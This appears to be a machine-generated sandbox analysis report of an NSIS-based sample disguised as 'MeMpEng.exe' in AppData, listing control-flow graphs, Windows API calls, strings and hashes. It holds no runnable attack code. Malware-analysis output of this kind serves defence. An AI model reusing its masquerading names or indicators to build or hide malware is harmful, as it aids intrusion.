                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 121052019-0
                                                          • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                          • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                                          • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                          • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 403c26-403c3e call 406948 312 403c40-403c50 call 40649b 309->312 313 403c52-403c89 call 406422 309->313 321 403cac-403cd5 call 403efc call 405f2b 312->321 318 403ca1-403ca7 lstrcatW 313->318 319 403c8b-403c9c call 406422 313->319 318->321 319->318 327 403d67-403d6f call 405f2b 321->327 328 403cdb-403ce0 321->328 334 403d71-403d78 call 406591 327->334 335 403d7d-403da2 LoadImageW 327->335 328->327 329 403ce6-403d0e call 406422 328->329 329->327 336 403d10-403d14 329->336 334->335 338 403e23-403e2b call 40140b 335->338 339 403da4-403dd4 RegisterClassW 335->339 343 403d26-403d32 lstrlenW 336->343 344 403d16-403d23 call 405e50 336->344 351 403e35-403e40 call 403efc 338->351 352 403e2d-403e30 338->352 340 403ef2 339->340 341 403dda-403e1e SystemParametersInfoW CreateWindowExW 339->341 349 403ef4-403efb 340->349 341->338 345 403d34-403d42 lstrcmpiW 343->345 346 403d5a-403d62 call 405e23 call 406554 343->346 344->343 345->346 350 403d44-403d4e GetFileAttributesW 345->350 346->327 355 403d50-403d52 350->355 356 403d54-403d55 call 405e6f 350->356 362 403e46-403e60 ShowWindow call 4068d8 351->362 363 403ec9-403eca call 4056ac 351->363 352->349 355->346 355->356 356->346 370 403e62-403e67 call 4068d8 362->370 371 403e6c-403e7e GetClassInfoW 362->371 366 403ecf-403ed1 363->366 368 403ed3-403ed9 366->368 369 403eeb-403eed call 40140b 366->369 368->352 372 403edf-403ee6 call 40140b 368->372 369->340 370->371 375 403e80-403e90 GetClassInfoW RegisterClassW 371->375 376 403e96-403eb9 DialogBoxParamW call 40140b 371->376 372->352 375->376 379 403ebe-403ec7 call 403b76 376->379 379->349
                                                          APIs
                                                            • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                                            • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406975
                                                          • lstrcatW.KERNEL32 ref: 00403CA7
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,7570D4C4), ref: 00403D27
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                                          • LoadImageW.USER32 ref: 00403D8E
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                                          • SystemParametersInfoW.USER32 ref: 00403DE3
                                                          • CreateWindowExW.USER32 ref: 00403E18
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                                          • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                                          • RegisterClassW.USER32(007A7200), ref: 00403E90
                                                          • DialogBoxParamW.USER32 ref: 00403EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-3158641114
                                                          • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                          • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                                          • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                          • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034d1 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 4034e7 call 4034d1 402->405 406 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 414 4031e2-4031e6 410->414 415 403168-40317c call 405fff 410->415 419 4031f0-4031f6 414->419 420 4031e8-4031ef call 40303e 414->420 415->419 432 40317e-403185 415->432 425 403205-40320d 419->425 426 4031f8-403202 call 406a35 419->426 420->419 425->398 433 403213 425->433 426->425 429->403 429->406 432->419 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->419 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 405fff 439->441 440->419 442 403199-4031a0 440->442 446 4032d0 441->446 442->419 443 4031a2-4031c2 442->443 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->419 449 4031de-4031e0 447->449 448->433 448->447 449->419
                                                          APIs
                                                          • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\MeMpEng.exe,00000400), ref: 004030CF
                                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\MeMpEng.exe,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\MeMpEng.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-3088459453
                                                          • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                          • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                                          • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                          • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 671 406591-40659a 672 40659c-4065ab 671->672 673 4065ad-4065c7 671->673 672->673 674 4067d7-4067dd 673->674 675 4065cd-4065d9 673->675 677 4067e3-4067f0 674->677 678 4065eb-4065f8 674->678 675->674 676 4065df-4065e6 675->676 676->674 680 4067f2-4067f7 call 406554 677->680 681 4067fc-4067ff 677->681 678->677 679 4065fe-406607 678->679 682 4067c4 679->682 683 40660d-406650 679->683 680->681 685 4067d2-4067d5 682->685 686 4067c6-4067d0 682->686 687 406656-406662 683->687 688 406768-40676c 683->688 685->674 686->674 691 406664 687->691 692 40666c-40666e 687->692 689 4067a0-4067a4 688->689 690 40676e-406775 688->690 695 4067b4-4067c2 lstrlenW 689->695 696 4067a6-4067af call 406591 689->696 697 406785-406791 call 406554 690->697 698 406777-406783 call 40649b 690->698 691->692 693 406670-40668e call 406422 692->693 694 4066a8-4066ab 692->694 705 406693-406696 693->705 702 4066ad-4066b9 GetSystemDirectoryW 694->702 703 4066be-4066c1 694->703 695->674 696->695 706 406796-40679c 697->706 698->706 707 40674b-40674e 702->707 708 4066d3-4066d7 703->708 709 4066c3-4066cf GetWindowsDirectoryW 703->709 711 406750-406753 705->711 712 40669c-4066a3 call 406591 705->712 706->695 713 40679e 706->713 707->711 714 406760-406766 call 406802 707->714 708->707 715 4066d9-4066f7 708->715 709->708 711->714 717 406755-40675b lstrcatW 711->717 712->707 713->714 714->695 719 4066f9-406709 SHGetFolderPathW 715->719 720 40670b-406723 call 406948 715->720 717->714 719->720 723 406745-406749 719->723 727 406725-406738 SHGetPathFromIDListW CoTaskMemFree 720->727 728 40673a-406743 720->728 723->707 727->723 727->728 728->715 728->723
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,?,?,00000000,00000000,0079A700,756F110C), ref: 004066C9
                                                          • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,Call), ref: 00406705
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406730
                                                          • lstrcatW.KERNEL32 ref: 0040675B
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,?,?,00000000,00000000,0079A700,756F110C), ref: 004067B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPath$FolderFreeFromListSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 2237929815-3403710426
                                                          • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                          • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                                          • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                          • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 793 401794-4017b9 call 402dcb call 405e9a 798 4017c3-4017d5 call 406554 call 405e23 lstrcatW 793->798 799 4017bb-4017c1 call 406554 793->799 805 4017da-4017db call 406802 798->805 799->805 808 4017e0-4017e4 805->808 809 4017e6-4017f0 call 4068b1 808->809 810 401817-40181a 808->810 818 401802-401814 809->818 819 4017f2-401800 CompareFileTime 809->819 812 401822-40183e call 406044 810->812 813 40181c-40181d call 40601f 810->813 820 401840-401843 812->820 821 4018b2-4018db call 4055d9 call 4032d9 812->821 813->812 818->810 819->818 822 401894-40189e call 4055d9 820->822 823 401845-401883 call 406554 * 2 call 406591 call 406554 call 405bb4 820->823 835 4018e3-4018ef SetFileTime 821->835 836 4018dd-4018e1 821->836 833 4018a7-4018ad 822->833 823->808 857 401889-40188a 823->857 837 402c58 833->837 839 4018f5-401900 CloseHandle 835->839 836->835 836->839 843 402c5a-402c5e 837->843 841 401906-401909 839->841 842 402c4f-402c52 839->842 845 40190b-40191c call 406591 lstrcatW 841->845 846 40191e-401921 call 406591 841->846 842->837 851 401926-4023bd 845->851 846->851 855 4023c2-4023c7 851->855 856 4023bd call 405bb4 851->856 855->843 856->855 857->833 858 40188c-40188d 857->858 858->822
                                                          APIs
                                                          • lstrcatW.KERNEL32 ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive$C:\Users\user\AppData\Local\Temp\nsnB972.tmp$C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll$Call
                                                          • API String ID: 1941528284-258728799
                                                          • Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                                          • Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
                                                          • Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                                          • Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 859 4055d9-4055ee 860 4055f4-405605 859->860 861 4056a5-4056a9 859->861 862 405610-40561c lstrlenW 860->862 863 405607-40560b call 406591 860->863 865 405639-40563d 862->865 866 40561e-40562e lstrlenW 862->866 863->862 868 40564c-405650 865->868 869 40563f-405646 SetWindowTextW 865->869 866->861 867 405630-405634 lstrcatW 866->867 867->865 870 405652-405694 SendMessageW * 3 868->870 871 405696-405698 868->871 869->868 870->871 871->861 872 40569a-40569d 871->872 872->861
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                          • lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                          • lstrcatW.KERNEL32 ref: 00405634
                                                          • SetWindowTextW.USER32 ref: 00405646
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll
                                                          • API String ID: 2531174081-3642747575
                                                          • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                          • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                                          • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                          • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 873 4032d9-4032f0 874 4032f2 873->874 875 4032f9-403302 873->875 874->875 876 403304 875->876 877 40330b-403310 875->877 876->877 878 403320-40332d call 4034d1 877->878 879 403312-40331b call 4034e7 877->879 883 403333-403337 878->883 884 4034bf 878->884 879->878 885 40346a-40346c 883->885 886 40333d-403363 GetTickCount 883->886 887 4034c1-4034c2 884->887 888 4034ac-4034af 885->888 889 40346e-403471 885->889 890 4034c7 886->890 891 403369-403371 886->891 892 4034ca-4034ce 887->892 893 4034b1 888->893 894 4034b4-4034bd call 4034d1 888->894 889->890 895 403473 889->895 890->892 896 403373 891->896 897 403376-403384 call 4034d1 891->897 893->894 894->884 905 4034c4 894->905 899 403476-40347c 895->899 896->897 897->884 907 40338a-403393 897->907 902 403480-40348e call 4034d1 899->902 903 40347e 899->903 902->884 910 403490-40349c call 4060f6 902->910 903->902 905->890 909 403399-4033b9 call 406aa3 907->909 914 403462-403464 909->914 915 4033bf-4033d2 GetTickCount 909->915 919 403466-403468 910->919 920 40349e-4034a8 910->920 914->887 917 4033d4-4033dc 915->917 918 40341d-40341f 915->918 922 4033e4-403415 MulDiv wsprintfW call 4055d9 917->922 923 4033de-4033e2 917->923 924 403421-403425 918->924 925 403456-40345a 918->925 919->887 920->899 921 4034aa 920->921 921->890 930 40341a 922->930 923->918 923->922 928 403427-40342e call 4060f6 924->928 929 40343c-403447 924->929 925->891 926 403460 925->926 926->890 933 403433-403435 928->933 932 40344a-40344e 929->932 930->918 932->909 934 403454 932->934 933->919 935 403437-40343a 933->935 934->890 935->932
                                                          APIs
                                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403343
                                                          • GetTickCount.KERNEL32(STy,00793700,00004000), ref: 004033C7
                                                          • MulDiv.KERNEL32 ref: 004033F0
                                                          • wsprintfW.USER32 ref: 00403403
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
